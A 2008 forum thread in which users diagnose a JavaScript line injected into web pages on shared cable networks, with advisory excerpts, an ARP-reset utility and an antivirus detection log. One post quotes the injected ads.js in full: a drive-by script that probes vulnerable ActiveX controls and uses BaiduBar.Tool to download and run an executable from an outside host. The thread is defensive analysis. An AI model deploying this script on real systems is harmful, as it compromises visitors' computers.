Re: Is my ISP injecting JS line ?
Posted: Thu Jan 17, 2008 4:53 pm
I'll bet there is just some cracker (negative hacker) out there reading this, and just laughing his head off.
A community of PHP developers offering assistance, advice, discussion, and friendship.
http://forums.devnetwork.net/
First of all, most ISPs here provide internet through a local cable operator as a gateway and most of these gateways are on Windows - not Linux. And I wont be surprised if its running on WinXP or Win2000. Linux at the local customer-level is still a long way.Everah wrote:How can an ISP not protect their equipment enough to allow something like this to happen?
From Nerul here and same setup - using Sify though.chillpill_rohit wrote:and im a part of a local area network hosted by a local cable operator
I can never seem to talk to my cable operator in such depths. I can understand that he has no clue as to whats going on - because he keeps saying "??? ? ??? ?? ??? ?? ? ???? ???? ??? ??????"chillpill_rohit wrote:ME and our cable operator had no clue that its such a big problem only after reading your blogs
Not all the time - even at night I face same issues - guess some PC is still on at the time. But often I have noticed smooth connectivity during the night. But also a request timed out.chillpill_rohit wrote:1. The net never disconnects at nite... arnd after 10pm till early in the morning arnd 8 or 9am when usually offices start...i got many office networks inside my local area network.
This is news to me. Unfortunately I dont know any IPs in my network (its going to be tedious to try all out)chillpill_rohit wrote:2. Whenever net disconnects i ping to my gateway 172.25.0.1 and i get request timed out but thn at the same time if i ping to sum1 else on my network eg : 172.25.3.120 or 172.25.3.39 (rather they r dead or alive)
my ping to gateway 172.25.0.1 immediately starts responding and the net starts working as normal........again if it gets disconnected i do the same procedure.......
Code: Select all
10.12.165.90 - - [14/Jan/2008:22:45:52 +0530] "OPTIONS / HTTP/1.1" 200 -
....
10.12.165.133 - - [15/Jan/2008:20:56:38 +0530] "OPTIONS / HTTP/1.1" 200 -
...
10.12.165.133 - - [18/Jan/2008:10:50:36 +0530] "OPTIONS / HTTP/1.1" 200 -Redirect ? Are you sure ? I never got redirected. All my pages got injected with that JS line on top and tried to pull that JS file first. I hope thats what you meant by redirect.chillpill_rohit wrote:3. I have observed tht whenever my net gets connected the first site i get redirected to is http://g.asdafdgfgf.com/ads.js which u all r talking abt....
This may be true, but because of the randomness, its quite difficult to know. But what I dont understand is, how can a PC in the network send the html page to the gateway and then send it to the users. Shouldnt it be the other way round - gateway sends data to PCs and on the way one the infected PCs injects that JS line to other destined PCs - I suck at networking, but I thought this was how point-to-point works.chillpill_rohit wrote:2. Intrusion frm local network ... that is frm the PCs in my network which dont have proper antivirus and in which tht javascript is residing and continuously addressing the gateway 172.25.0.1 which we all share in our ip range......so the point is due such few infected PCs which i found are OFF during night time( when net works perfectly fine)......
Its the firewall thats required more than the anti-virus. But most cost which ppl wont buy.chillpill_rohit wrote:but wat remains is the internal attack which still is cloggin the gateway .........to solve this we have asked all the users in my ip range to install Nod32 or Norton to secure there PCs so tht it doesnt allow such scripts to run on their PCs and congest the gateway...........
Maybe it will help if you set a static ARP entry for your gateway IP.yochints wrote:if you clear the arp cache on your windows pc (by either repair or the arp -d * command) the network starts working.
Care to share that code ?yochints wrote:I got frustrated repairing the connection each and everytime ! .. so finally I have written a program to keep checking up the connection status every 30 seconds and repair it automatically if required ! .. now I don't need to do anything.. i have a log with disconnections every 10 minutes ..
Code: Select all
if (document.cookie.indexOf('OKSUN') == -1)
{
try
{
var e;
var ado = (document.createElement("object"));
ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as = ado.createobject("Adodb.Stream", "")
}
catch(e){};
finally
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = 'OKSUN=SUN;path=/;expires='+expires.toGMTString();
document.write("<\/script>");
if(e != "[object Error]")
{
document.write("<\/script>")
}
else
{
try
{
var f;
var storm = new ActiveXObject("MPS.StormPlayer")
}
catch(f){};
finally
{
if (f != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var g;
var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
}
catch(g){};
finally
{
if (g != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var h;
var thunder = new ActiveXObject("DPClient.Vod")
}
catch(h){};
finally
{
if (h != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var i;
var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
}
catch(i){};
finally
{
if (i != "[object Error]")
{
document.write("")
}
}
try
{
var j;
var obj = new ActiveXObject("BaiduBar.Tool")
}
catch(j){};
finally
{
if (j != "[object Error]")
{
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
document.write("")
}
}
if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
{
document.write("")
}
}
}
}Code: Select all
var storm = new ActiveXObject("MPS.StormPlayer")Related : xforce.iss.net, securityvulns.comZhenHan.Liu has discovered some vulnerabilities in Baofeng Storm, which can be exploited by malicious people to compromise a user's system.
1) A boundary error in sparser.dll can be exploited to cause a stack-based buffer overflow via e.g. an overly long (greater than 260 bytes) string passed as argument to the "rawParse()" and "advancedOpen()" methods and "URL" property within the MPS.StormPlayer.1 ActiveX control (mps.dll), or via a specially crafted .SMPL file containing an overly long (greater than 260 bytes) "path" string.
2) A boundary error within the MPS.StormPlayer.1 ActiveX control (mps.dll) when handling the "isDVDPath()" method can be exploited to cause a stack-based buffer overflow via an overly long (greater than 260 bytes) string passed as argument to the affected method.
3) Boundary errors within the MPS.StormPlayer.1 ActiveX control (mps.dll) when handling the "backImage()" and "titleImage()" properties can be exploited to cause heap-based buffer overflows by assigning an overly long (greater than 260 bytes) string to the affected properties.
Successful exploitation of the vulnerabilities allow execution of arbitrary code.
Code: Select all
var thunder = new ActiveXObject("DPClient.Vod")7jdg has reported a vulnerability in Xunlei Thunder, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to a boundary error in the DPClient.Vod.1 ActiveX control (DapPlayer_Now.dll) when handling arguments passed to the "DownURL2()" method. This can be exploited to cause a buffer overflow by passing an overly long argument to the affected method.
Successful exploitation allows execution of arbitrary code.
The vulnerability is reported in version 5.6.9.344. Other versions may also be affected.
Code: Select all
var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")The biggest threat is the BaiduBar.Tool ActiveXObject object because it tries to download an exe file.Some vulnerabilities have been discovered in Ourgame GLWorld, which can be exploited by malicious people to compromise a user's system.
The vulnerabilities are caused due to boundary errors within the GLCHAT.GLChatCtrl.1 ActiveX control (GLChat.ocx) when handling the "ConnectAndEnterRoom()" method. These can be exploited to cause stack-based buffer overflows by passing overly long arguments to the affected method.
Successful exploitation allows execution of arbitrary code.
The vulnerabilities are confirmed in version 2.7.0.8 including GLChat.ocx version 2.5.1.32. Other versions may also be affected.
Code: Select all
var obj = new ActiveXObject("BaiduBar.Tool")
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);Thats probably why Baidu is used by many - download mp3s !The MP3 search of Baidu has been criticized by the Office of the United States Trade Representative's Special 301 report by stating that “Baidu as the largest of an estimated seven or more China-based ‘MP3 search engines’ offering deep links to song files for downloads or streaming.
I thought it was CSS that wasnt getting parsed properly because of the missing JavaScript.Merge9 wrote:I thought I could safely ifnore this little piece of offending code as I had set the site in my host file to point to 127.0.0.1 and my virus software was dealing with it BUT adding that piece of code still affects 'some' pages I view but causing things like the font to be larger or some other formatting of the page error.
Any clue if this is getting added to incoming bytes to ports other than 80 ? I am facing issues FTP, SFTP quite often, but no clue if the JS line is getting injected in those requests too.Merge9 wrote:Worse it must be getting added to even programs code that uses the net as one of my key programs that accesses an API does not work - it does work when I go through proxy with it.
Thats the weirdest part - how come this is not common enough.Merge9 wrote:So it seems the code it getting added from the server rather than my computer!!!! (this really is weird as I am the only computer on my network getting it and I am on a dynamicaly allocated IP from my wireless router). If this is so WHY am I the only one seems to be reporting this in the UK and on Virgin. Surely this would be more widespread.
AdBlock Plus extension for FireFox.Merge9 wrote:Is there some way I can access the prerender engine of my browser and add some java script that removes the offending code before it renders??
Code: Select all
Public Class Form1
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
test_and_login()
End Sub
Private Sub test_and_login()
Try
If My.Computer.Network.Ping("www.google.com", 1000) Then
Label4.Text = "Success"
Else
Label4.Text = "Failed"
Shell("arp -d *")
TextBox1.Text = "Failed - " & Now & Environment.NewLine & TextBox1.Text
End If
Label2.Text = Now
Catch ex As Exception
End Try
End Sub
End ClassCode: Select all
1/20/2008 5:53:47 PM Real-time file system protection file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:32:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:32:27 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:28:21 PM Real-time file system protection file C:\WINDOWS\explorer.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\system32\drwtsn32.exe.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUP_CK.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUPEX.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:06 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\INPAGE.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CRYPSERV.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKRFRESH.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKCONFIG.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:04 PM Real-time file system protection file D:\SOFTWARE\SONY\START.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DASHBOARD\MSISETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:46 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-25\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:45 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-20\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DCU-11\UNINSTALLDRIVER.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\PHONE.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:42 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\BIN\DEMO32.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:32 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\PSA\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:30 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\D2P\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:20:20 PM Real-time file system protection file D:\SOFTWARE\POWERDVD\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:56 PM Real-time file system protection file D:\SOFTWARE\OXFORD\QUICKFIND\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:42 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:39 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:18:00 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUPX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:50 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W9X\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:49 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W2K\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:37 PM Real-time file system protection file D:\SOFTWARE\NERO\NERO MEDIA PLAYER\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:06:18 PM Real-time file system protection file D:\EXTRAS\SOMETHING\LOVEX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:05:54 PM Real-time file system protection file D:\CIES INTERNET\ANTI-VíRUS AVG 7.0 + SERIAL\AVG70F_148.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:04:51 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242074.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524427.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524401.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524400.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524392.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524398.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510607.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510608.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:00 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510603.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:00:26 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242078.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524445.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524446.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:37 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP119\A0510708.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:35 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP108\A0470803.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:52:45 PM Real-time file system protection file C:\WINDOWS\LINKINFO.dll Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Internet Explorer\iexplore.exe.
1/20/2008 4:45:30 PM Real-time file system protection file C:\WINDOWS\LINKINFO.DLL Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:44:52 PM Real-time file system protection file C:\Program Files\Internet Explorer\iexplore.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:55 PM Startup scanner file C:\WINDOWS\system32\msiexec.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\WINDOWS\system32\cqmjp.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:52 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\49400WO.DLL a variant of Win32/PSW.WOW.SV trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:48 PM Startup scanner file C:\WINDOWS\49400MM.DLL a variant of Win32/PSW.Legendmir.NFF trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:46 PM Startup scanner file C:\WINDOWS\49400WL.DLL Win32/PSW.Legendmir.NFN trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:45 PM Startup scanner file C:\WINDOWS\Explorer.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:44 PM Real-time file system protection file C:\WINDOWS\system32\taskmgr.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: \??\C:\WINDOWS\system32\winlogon.exe.
1/20/2008 4:41:41 PM Startup scanner file C:\WINDOWS\explorer.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\userinit.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\logon.scr Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:38 PM Startup scanner file C:\WINDOWS\system32\logonui.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\system32\rundll32.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\49400W.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:35 PM Startup scanner file C:\WINDOWS\49400L.exe Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:33 PM Startup scanner file C:\WINDOWS\49400M.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:31 PM Startup scanner file C:\WINDOWS\system32\vgbxiqre.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:30 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:28 PM Startup scanner file C:\WINDOWS\system32\iexplore.exe a variant of Win32/Poebot trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCMTR.EXE Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\system32\Hdaudpropshortcut.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:23 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:22 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Common Files\Real\Update_OB\r1puninst.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
